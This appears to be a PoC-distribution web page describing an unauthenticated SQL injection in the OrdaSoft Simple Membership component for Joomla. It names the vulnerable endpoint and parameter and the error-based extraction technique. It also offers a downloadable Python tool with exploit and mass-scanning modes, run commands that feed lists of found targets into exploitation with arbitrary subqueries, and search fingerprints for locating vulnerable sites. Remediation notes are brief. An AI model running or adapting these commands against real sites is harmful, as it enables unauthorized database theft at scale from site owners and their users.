POCBIT

Telegram — New PoC releases & critical CVE alerts

You can join our Telegram channel to get instant updates on new PoC releases and critical CVE alerts.

Join @pocbit
Joomlacritical

CVE-2026-102782 — OrdaSoft Joomla Simple Membership <7.4.0 Unauthenticated SQLi (checkLoginPass)

October 7, 2026 · 90 views

OrdaSoft Simple Membership (com_simplemembership) <7.4.0: task=checkLoginPass embeds unfiltered login param in SQL — unauthenticated error-based extractvalue leak (CWE-89). CVSS 4.0 9.3 Critical. Fixed 7.4.0+. Python PoC: check/exploit/mass -j, hits.txt & exploited.txt, optional --subquery. Marker POCBIT-102782-OK.

#joomla#ordasoft#simple-membership#sqli#cwe-89#unauthenticated#critical

CVE:

CVE-2026-102782

Date:

2026-10-07

Severity:

CRITICAL

Exploit source

Full PoC repository on GitHub (public).

Description

Overview

CVE-2026-102782 — OrdaSoft Simple Membership (com_simplemembership) for Joomla — unauthenticated SQL injection on task=checkLoginPass via the login request parameter (CWE-89, CVSS 4.0 9.3 Critical).

| | | |---|---| | Affected | < 7.4.0 | | Fixed | ≥ 7.4.0 | | Endpoint | index.php?option=com_simplemembership&task=checkLoginPass&format=raw&login= | | Verify marker | POCBIT-102782-OK (optional in --subquery) |

The handler passes login through Joomla’s generic input filter (HTML stripped; quotes/SQL not neutralized) and concatenates it into SQL. The PoC uses error-based extractvalue and reads ~leak~ from the response (often HTTP 500 error body).

Subdirectory installs: use the Joomla base path, e.g. https://example.com/simplemembership.

PoC page: https://pocbit.org/pocs/cve-2026-102782

GitHub: murrez/CVE-2026-102782

CVE.org: CVE-2026-102782

NVD: CVE-2026-102782

Bundled tool (Python 3)

Download cve-2026-102782.py — writes poc.py, requirements.txt, targets.example.txt.

python cve-2026-102782.py
pip install -r requirements.txt

python poc.py -u https://target.tld/simplemembership --mode check --aggressive
python poc.py -u https://target.tld --mode exploit
python poc.py -u https://target.tld --mode exploit --subquery "SELECT user()"
python poc.py --list targets.example.txt --mode check -j 25
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()"

Outputs: hits.txt, exploited.txt, cve_2026_102782_*.jsonl.

Discovery hints (your assets only)

body="com_simplemembership" && body="ordasoft"
body="task=checkLoginPass"

Remediation

  1. Upgrade Simple Membership to ≥ 7.4.0.
  2. Audit Joomla sites for com_simplemembership in extension lists.
  3. Review logs for checkLoginPass with malformed login values.

See Joomla security checklist (2026) and OrdaSoft CCK upload RCE (different OrdaSoft component).

Legal and ethical use

Authorized security testing only.

References

Related PoCs

Same platform, vendor, or tags — explore more write-ups on Pocbit.

Browse full PoC archive →